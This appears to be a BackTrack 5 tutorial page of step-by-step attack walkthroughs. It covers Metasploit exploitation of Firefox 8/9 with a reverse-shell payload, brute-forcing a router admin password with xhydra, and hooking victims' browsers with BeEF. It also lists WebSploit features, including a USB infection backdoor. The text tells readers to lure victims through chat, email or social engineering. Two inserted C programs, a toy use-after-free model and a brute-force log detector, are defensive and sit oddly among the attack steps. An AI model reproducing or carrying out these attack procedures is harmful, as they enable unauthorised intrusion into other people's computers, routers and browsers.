BackTrack 5 Tutorials
Hacking Windows XP with Firefox 8/9 AttributeChildRemoved() Use-After-Free
This module exploits a use-after-free vulnerability in Firefox 8/8.0.1 and 9/9.0.1. Removing child nodes from the nsDOMAttribute can leave a child accessible after removal, because the AttributeChildRemoved notification is sent prematurely: mFirstChild is not set to NULL until after this call is made, so the removed child is still reachable after it has been removed. By carefully manipulating the memory layout, this can lead to arbitrary code execution.
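To make the ordering defect described above concrete, here is an added C model of a parent node that frees a child. It is not Mozilla's code and not the Metasploit module: the Node and Attribute types, the observer callback and run_removal are all constructed for this illustration. In the buggy ordering the listener is notified while mFirstChild still points at the node about to be freed, so a listener can walk the child list and keep a reference that outlives the free(); in the fixed ordering the pointer is updated before anyone is told. The fix shown is the generic remedy for this class of ordering bug, not necessarily the exact Mozilla patch.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Constructed toy model (hypothetical, not Mozilla's nsDOMAttribute):
   an attribute owning a singly linked list of child nodes. */
typedef struct Node {
    struct Node *next;
    char name[16];
} Node;

typedef struct {
    Node *mFirstChild;   /* same role as the field named in the advisory text */
} Attribute;

/* A "child removed" listener, as a DOM mutation observer might behave:
   it walks the parent's child list. If the parent still points at the
   node being removed, the listener can obtain a reference to it, and that
   reference outlives the free() that follows. We only record the fact;
   we never dereference freed memory. */
static void observer(const Attribute *attr, const Node *removed, int *stale_seen) {
    for (const Node *n = attr->mFirstChild; n != NULL; n = n->next)
        if (n == removed)
            *stale_seen = 1;
}

/* Buggy ordering: notify first, unlink afterwards. */
static int remove_child_buggy(Attribute *attr, int *stale_seen) {
    Node *child = attr->mFirstChild;
    if (child == NULL) return -1;
    observer(attr, child, stale_seen);   /* premature notification */
    attr->mFirstChild = child->next;     /* pointer cleared only after the listener ran */
    free(child);
    return 0;
}

/* Fixed ordering: unlink first, then notify, then free. */
static int remove_child_fixed(Attribute *attr, int *stale_seen) {
    Node *child = attr->mFirstChild;
    if (child == NULL) return -1;
    attr->mFirstChild = child->next;     /* no path from the parent to the child remains */
    observer(attr, child, stale_seen);
    free(child);
    return 0;
}

static Attribute *make_attr_with_one_child(void) {
    Attribute *a = malloc(sizeof *a);
    Node *c = malloc(sizeof *c);
    strcpy(c->name, "child");
    c->next = NULL;
    a->mFirstChild = c;
    return a;
}

/* Returns 1 if the listener could reach the node that was about to be freed. */
int run_removal(int use_fix) {
    Attribute *a = make_attr_with_one_child();
    int stale_seen = 0;
    if (use_fix)
        remove_child_fixed(a, &stale_seen);
    else
        remove_child_buggy(a, &stale_seen);
    free(a);
    return stale_seen;
}

int main(void) {
    printf("buggy ordering: stale reference observable = %d\n", run_removal(0));
    printf("fixed ordering: stale reference observable = %d\n", run_removal(1));
    return 0;
}
```

The general lesson is the one the advisory text states: any bookkeeping that makes an object unreachable must be finished before code outside the owner (listeners, callbacks, script) is allowed to run, because that code may stash a pointer that the subsequent free() turns dangling.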
Exploit Targets
Mozilla Firefox 9.0.1
Win SP2
Requirement
Attacker: Backtrack 5
Victim PC: Windows XP
Open a BackTrack terminal and type msfconsole

Now type use exploit/windows/browser/mozilla_attribchildremoved
msf exploit(mozilla_attribchildremoved) > set payload windows/meterpreter/reverse_tcp
msf exploit(mozilla_attribchildremoved) > set lhost 192.168.1.3 (IP of the local host)
msf exploit(mozilla_attribchildremoved) > set srvhost 192.168.1.3 (this must be an address on the local machine)
msf exploit(mozilla_attribchildremoved) > set uripath balancesheet (the URL path to use for this exploit)
msf exploit(mozilla_attribchildremoved) > exploit

The URL to give to the victim is http://192.168.1.3:8080/balancesheet

Send the link to the server to the victim via chat, email or any social engineering technique.
Now you have access to the victim's PC. Use "sessions -l" to list the sessions and their IDs, then type "sessions -i ID" to connect to a session.
How to Install WebSploit Toolkit in Backtrack
WebSploit is an open source project for scanning and analysing remote systems for vulnerabilities.
Description:
- Autopwn – uses Metasploit to scan and exploit target services
- wmap – scans and crawls the target using the Metasploit wmap plugin
- format infector – injects a reverse or bind payload into a file format
- phpmyadmin – searches for the target's phpMyAdmin login page
- lfi – scans for and bypasses local file inclusion vulnerabilities, and can bypass some WAFs
- apache users – searches for server user directories (if the target uses the Apache web server)
- Dir Bruter – brute-forces target directories with a wordlist
- admin finder – searches for the admin and login pages of the target
- MLITM Attack – Man Left In The Middle, XSS phishing attacks
- MITM – Man In The Middle attack
- Java Applet Attack – Java signed applet attack
- MFOD Attack Vector – Middle Finger Of Doom attack vector
- USB Infection Attack – creates an executable backdoor to infect a USB drive for Windows
How to Install WebSploit in Backtrack
- First download the WebSploit toolkit from here
- Now unzip the file and copy the WebSploit V.1.6 Toolkit folder into the web directory under pentest
- Now change the permissions of the websploit file in the WebSploit folder: right click on the websploit file and select Properties

Select the Permissions tab, tick "Allow executing file as program", then click Close

Now open your BackTrack terminal and type
cd /pentest/web/websploit
./websploit

How to Break a Router Password using Backtrack
Open your BackTrack terminal, type xhydra and press enter

In the target tab, select
Single Target: 192.168.1.1
Protocol: http-get

In the passwords tab, select
Username: admin (because most routers have admin as the default username)
In the password section, select the password list option and browse to select your password file. Here I have used my custom password file.

In the Specific tab, select
http/https URL: http://192.168.1.1/

Now select the Start tab and click the Start button; the password cracking begins and the result is as follows

Open the browser and type http://192.168.1.1/
Enter the password you got from xhydra to get administrative access to the router
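From the defending side, the trace a password-list run like the one above leaves in the router's web log is easy to spot: a burst of HTTP 401 responses from a single client, often followed by a 200 once a guess succeeds. The following C program is an added example, not part of the original tutorial and not part of hydra. It parses constructed Common Log Format lines (the sample log, the 401 threshold and every function name are assumptions for the illustration), counts failed logins per source and flags sources that reach the threshold, noting when a successful login follows the failures.

```c
#include <stdio.h>
#include <string.h>

#define MAX_SOURCES 32

/* Constructed sample access log from a hypothetical router admin interface
   (Common Log Format). These lines are made up for the example:
   192.168.1.50 collects seven 401s in a row and then a 200, the shape a
   password-list run leaves behind; 192.168.1.20 is a user who mistyped once. */
static const char *SAMPLE_LOG[] = {
    "192.168.1.20 - - [01/Jan/2013:10:00:01 +0000] \"GET / HTTP/1.1\" 401 381",
    "192.168.1.20 - admin [01/Jan/2013:10:00:09 +0000] \"GET / HTTP/1.1\" 200 2048",
    "192.168.1.50 - - [01/Jan/2013:10:01:00 +0000] \"GET / HTTP/1.1\" 401 381",
    "192.168.1.50 - - [01/Jan/2013:10:01:01 +0000] \"GET / HTTP/1.1\" 401 381",
    "192.168.1.50 - - [01/Jan/2013:10:01:02 +0000] \"GET / HTTP/1.1\" 401 381",
    "192.168.1.50 - - [01/Jan/2013:10:01:03 +0000] \"GET / HTTP/1.1\" 401 381",
    "192.168.1.50 - - [01/Jan/2013:10:01:04 +0000] \"GET / HTTP/1.1\" 401 381",
    "192.168.1.50 - - [01/Jan/2013:10:01:05 +0000] \"GET / HTTP/1.1\" 401 381",
    "192.168.1.50 - - [01/Jan/2013:10:01:06 +0000] \"GET / HTTP/1.1\" 401 381",
    "192.168.1.50 - admin [01/Jan/2013:10:01:07 +0000] \"GET / HTTP/1.1\" 200 2048",
};
static const int SAMPLE_LOG_LEN = sizeof SAMPLE_LOG / sizeof SAMPLE_LOG[0];

typedef struct {
    char ip[40];
    int failures;       /* 401 responses seen from this source */
    int success_after;  /* a 200 arrived after at least one 401 */
} SourceStats;

/* Parse one CLF line into the client IP and the status code. Returns 0 on success.
   Layout: ip ident authuser [date] "request" status bytes */
static int parse_line(const char *line, char *ip, int *status) {
    char req[128];
    int n = sscanf(line, "%39s %*s %*s [%*[^]]] \"%127[^\"]\" %d", ip, req, status);
    return n == 3 ? 0 : -1;
}

/* Look a source up in the table; optionally create it. */
static SourceStats *find_or_add(SourceStats *t, int *n, const char *ip, int add) {
    for (int i = 0; i < *n; i++)
        if (strcmp(t[i].ip, ip) == 0) return &t[i];
    if (!add || *n == MAX_SOURCES) return NULL;
    strcpy(t[*n].ip, ip);   /* ip is at most 39 chars, bounded by the sscanf width */
    t[*n].failures = 0;
    t[*n].success_after = 0;
    return &t[(*n)++];
}

/* Build per-source statistics from the log. Returns the number of distinct sources. */
int collect_stats(const char **lines, int nlines, SourceStats *out) {
    int n = 0;
    for (int i = 0; i < nlines; i++) {
        char ip[40];
        int status;
        if (parse_line(lines[i], ip, &status) != 0) continue;
        if (status == 401) {
            SourceStats *s = find_or_add(out, &n, ip, 1);
            if (s) s->failures++;
        } else if (status == 200) {
            SourceStats *s = find_or_add(out, &n, ip, 0);
            if (s && s->failures > 0) s->success_after = 1;
        }
    }
    return n;
}

/* Number of 401s the sample log holds for one source. */
int failures_for(const char *ip) {
    SourceStats t[MAX_SOURCES];
    int n = collect_stats(SAMPLE_LOG, SAMPLE_LOG_LEN, t);
    for (int i = 0; i < n; i++)
        if (strcmp(t[i].ip, ip) == 0) return t[i].failures;
    return 0;
}

/* Count (and report) sources whose failed-login count reaches the threshold. */
int flagged_sources(int threshold) {
    SourceStats t[MAX_SOURCES];
    int n = collect_stats(SAMPLE_LOG, SAMPLE_LOG_LEN, t);
    int flagged = 0;
    for (int i = 0; i < n; i++) {
        if (t[i].failures >= threshold) {
            flagged++;
            printf("%s: %d failed logins%s\n", t[i].ip, t[i].failures,
                   t[i].success_after ? ", followed by a successful login" : "");
        }
    }
    return flagged;
}

int main(void) {
    printf("%d source(s) flagged at threshold 5\n", flagged_sources(5));
    return 0;
}
```

A single mistyped password stays below the threshold, while the guessing run is reported together with the fact that it ended in a successful login, which is the case that needs the router password changed rather than merely the source blocked. The same counting generalises to any log that records an HTTP status per client; only parse_line needs adapting to the router's actual log format.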


How to Hack Remote Web Browser with BeEF (Browser Exploitation Framework)
BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser. The Browser Exploitation Framework (BeEF) is a powerful professional security tool.
BeEF focuses on leveraging browser vulnerabilities to assess the security posture of a target. This project is developed solely for lawful research and penetration testing. BeEF hooks one or more web browsers as beachheads for the launching of directed command modules. Each browser is likely to be within a different security context, and each context may provide a set of unique attack vectors.
How to Install the Browser Exploitation Framework in BackTrack
First open your BackTrack and follow this path:
Applications -> Backtrack -> Exploitation Tools -> Social Engineering Tools -> BEEF XSS Framework -> BeEF Installer

BeEF is now successfully installed on your PC

How to use the Browser Exploitation Framework
Open your BackTrack and follow this path:
Applications -> Backtrack -> Exploitation Tools -> Social Engineering Tools -> BEEF XSS Framework -> BeEF


Then copy the URL and open it in the browser (this is my URL, based on the IP of my VirtualBox machine; yours will be different)
http://192.168.1.3:3000/ui/panel (beef is both the username and the password)

Send the link http://192.168.1.3:3000/demos/basic.html to the victim via chat, email or any social engineering technique

Now you have access to the victim's browser

